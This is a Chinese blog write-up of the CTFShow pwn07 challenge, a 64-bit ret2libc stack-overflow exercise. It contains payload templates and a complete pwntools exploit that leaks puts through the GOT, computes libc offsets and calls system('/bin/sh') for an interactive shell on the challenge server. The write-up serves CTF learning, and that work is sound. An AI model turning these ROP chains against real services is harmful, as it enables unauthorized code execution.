CTFShow pwn07 (ret2libc-64bit

最新推荐文章于 2023-04-20 19:12:37 发布
最新推荐文章于 2023-04-20 19:12:37 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: CTF 文章标签: python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mintind/article/details/128165311
版权

用ROPgabdet
找到pop rdi地址和ret地址:
在这里插入图片描述

来自ctfshow pwn7
64位程序是需要栈平衡的,而且前六个寄存器用完了才会用栈传参
%rdi,%rsi,%rdx,%rcx,%r8,%r9 用作函数参数,依次对应第1参数,第2参数…
system函数和puts函数都只有一个参数
ret是用来栈平衡的

来自ctfshow-pwn新手系列:

判断libc版本32位: b"a"*offset + p32(xx@plt) + p32(ret_addr) + p32(xx@got)
getshell: b"a"*offset + p32(system_addr) + b"AAAA" + p32(str_bin_sh)
判断libc版本64位: b"a"*offset + p64(pop_rdi) + p64(xx@got) + p64(xx@plt) + p64(ret_addr)
getshell: b"a"*offset + p64(ret) + p64(pop_rdi) + p64(str_bin_sh)

注意要连上远端后测puts的地址,本地运行可能不一样的(我是笨蛋吗被这个困这么久
而且本地运行可能会出现
在这里插入图片描述据说可能和ASLR有关(没搞懂

还有接受puts地址那里
puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
u64是64地址转整型,ljust(8, b'\x00')是左对齐用\x00填充至八位(但我还是不懂为什么这么写啊
下图中我把p.recvlinep.recv(6)p.recv(6).ljust(8, b'\x00')u64(p.recv(6).ljust(8, b'\x00')hex(u64(p.recv(6).ljust(8, b'\x00'))都输了一遍
在这里插入图片描述

自己写的exp(都没多大差别:


from pwn import *

context(arch = 'amd64', log_level = "debug")
#p = process("./pwn")
p = remote("pwn.challenge.ctf.show", 28104)
#gdb.attach(p)
elf = ELF("./pwn")
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
pop_rdi = 0x00000000004006e3
ret_addr = 0x00000000004004c6
main_addr = elf.symbols["main"]
payload1 = b'a'*(0xc + 8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendline(payload1)
print(p.recvline())  #p.recvuntil('\x0a')
puts_addr = p.recv(6)
print(puts_addr)
puts_addr = puts_addr.ljust(8, b'\x00')
print(puts_addr)
puts_addr = u64(puts_addr)
#puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
print(puts_addr)
print(hex(puts_addr))
#libc = LibcSearcher("puts", puts_addr)	#我LibcSearcher还是用不了——
#libcbase = puts_addr - libc.dump("puts")
#system_addr = libcbase + libc.dump("system")
#bin_sh = libcbase + libc.dump("str_bin_sh")
libcbase = puts_addr - 0x0809c0
system_addr = libcbase + 0x04f440
bin_sh = libcbase + 0x1b3e9a
payload2 = b'a' * (0xc + 8) + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
p.sendline(payload2)
p.interactive()
Mintind
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
LibcSearcher--匹配libc版本的神器
Assassin
04-06 8965
文章目录**一、简介****二、安装****版本一:本地判断libc的方法****版本二:在线使用webAPI的方式****三、关于本地libc文件的更新问题****四、使用方法** 一、简介 LibcSearcher是python的一个库,用于解决pwn中不明libc版本的情况,可以根据泄露的某函数地址,推测服务端使用的libc版本,是做题必备的神器。 根据网上的版本,我总结两个可以利用的方法 二、安装 版本一:本地判断libc的方法 使用原作者的版本即可,安装指令如下 git clone https
CTFshow-PWN-栈溢出(pwn36)
最新发布
Welcome To Myon'Blog !
04-23 841
每次调用 puts 函数时,它都会再次进入函数体内,然后又调用 puts 函数,这样就形成了无限递归调用。声明了一个长度为 36 字节的字符数组 s,调用 gets 函数,并将 s 数组作为参数传递给它,然后将 gets 函数的返回值作为 ctfshow 函数的返回值。这个特定的 puts 函数定义中,函数体内部再次调用了 puts 函数,并且传递了相同的参数 s。disass 是 GDB 的指令,这里是反汇编名为 get_flag 的函数。这里 s 数组存在栈溢出的可能,具体看后面的分析,
linux中ret2libc入门与实践
counsellor的专栏
08-23 6777
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
pwn刷题num24----ret2libc + 栈平衡
tbsqigongzi的博客
04-26 1168
BUUCTF-PWN-ciscn_2019_c_1 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,有三个选择, 欢迎来到这台加密机 1.加密 2.解密 3.退出 选加密1写入三个aaa,被加密成lll,选解密2,出了一句我认为你能自己解密。。。 ida看一
美团MTCTF 2022 ret2libc_aarch64 pwn
z1r0的博客
09-18 757
这里,这条指令的含义是sp存储的地址放入x29,sp + 8放入x30,最后sp += 0x20,X30为程序链接寄存器,保存子程序结束后需要执行的下一条指令,所以我们需要将sp + 8这里填入system_addr。之所以不找mov是因为mov x0在pwn文件里是没有的,利用还是挺难的, 都有跳转指令,因为前面泄露出了libc地址,可以试着在libc里面寻找gadgets。粉色的是gadgets的地址,红色的最后会给到x0,所以我们在这里填入bin_sh地址。,先看一下pwn文件的gadgets。
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
pwn》ret2libc2—x64简答例题+脚本加解析
Aiyflwoers的博客
03-28 696
题目地址:链接: https://pan.baidu.com/s/1isG2u-fpihbPt_Lumd4q5A?pwd=r9vn 提取码:r9vn 脚本展示: from pwn import* p=process('./babyrop') context.log_level='debug' gdb.attach(p) elf=ELF("./babyrop") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") padding=0x28 pop_rdi_ret_addr=
【HUST】信息系统安全:系统调用介入作业,安全策略制定,编写简单的64位ret2libc攻击程序
weixin_45695828的博客
05-21 1292
本次实验内容: 针对第一次作业的代码,利用seccomp方法进行对程序进行约束,使得attacker只能将/tmp/flag的内容,向标准输出(STDOUT )进行输出,且只能输出 32 bytes的内容。 要求: 1. 实现上述约束方法; 2. 通过attack,验证上述约束方法的效果,attack包括:1)调用system函数创建shell(或直接调用execve,或调用其它系统调用);2)向其它目标输出内容(如:STDERR)、输出长度调整(超过32 bytes)。 虽然说...
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4044
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1061
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
Pwn入门笔记(三)函数细节
qq_33590156的博客
11-25 2061
细节关于漏洞函数writeprintf关于p64(),u64(),int等转换函数题目中 关于漏洞函数 write write(参数1,参数2,参数3),write有三个参数,参数1是模式,“1”为写模式,参数2在栈上其实是一个地址,它会将这个地址上存的字符串给打印出来,参数3是打印字符串的长度。 printf 直接进行输出, “%p”,可以输出后面参数的地址 “%20 $p”(无空格),打印出偏移为21得地方的地址 “%20 $n”(无空格),写入%前字符串的长度到偏移为21得地方 "%70d%20 $n
buuctf(pwn
个人笔记
04-04 2667
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
使用ret2plt绕过libc安全区
海枫的专栏
08-11 8716
使用ret2plt绕过libc安全区
使用ret2libc攻击方法绕过数据执行保护
热门推荐
海枫的专栏
02-08 1万+
本文介绍ret2libc攻击方法,可以绕过栈执行保护安全机制
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值